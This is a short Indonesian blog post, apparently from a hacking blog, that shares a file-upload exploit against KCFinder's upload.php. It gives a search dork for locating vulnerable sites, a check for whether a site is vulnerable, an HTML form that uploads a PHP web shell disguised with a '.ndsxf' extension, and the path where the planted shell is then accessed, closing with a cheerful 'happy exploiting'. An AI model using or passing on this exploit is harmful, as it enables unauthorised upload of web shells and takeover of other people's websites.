this exploit discovered by incef team
nih udah lama emang, tpi apasalahnya share bwat yg blum tau bwat blajar jga..
Dah lngsng ja..
Dork: inurl:/kcfinder/upload.php (kmbangin sndiri y, jgn jagain dork)
Kalo vuln muncul "Unknown error"
Exploit :
<form action="site/path/kcfinder/upload.php" enctype="multipart/form-data" method="POST">
<input name="Filedata" type="file" /><button>~/ ndsxf</button></form>
Shell format : shell.php.ndsxf
Shell akses : site/path/upload/files/shell.php.ndsxf
slamat berexploitasi :)
No comments:
Post a Comment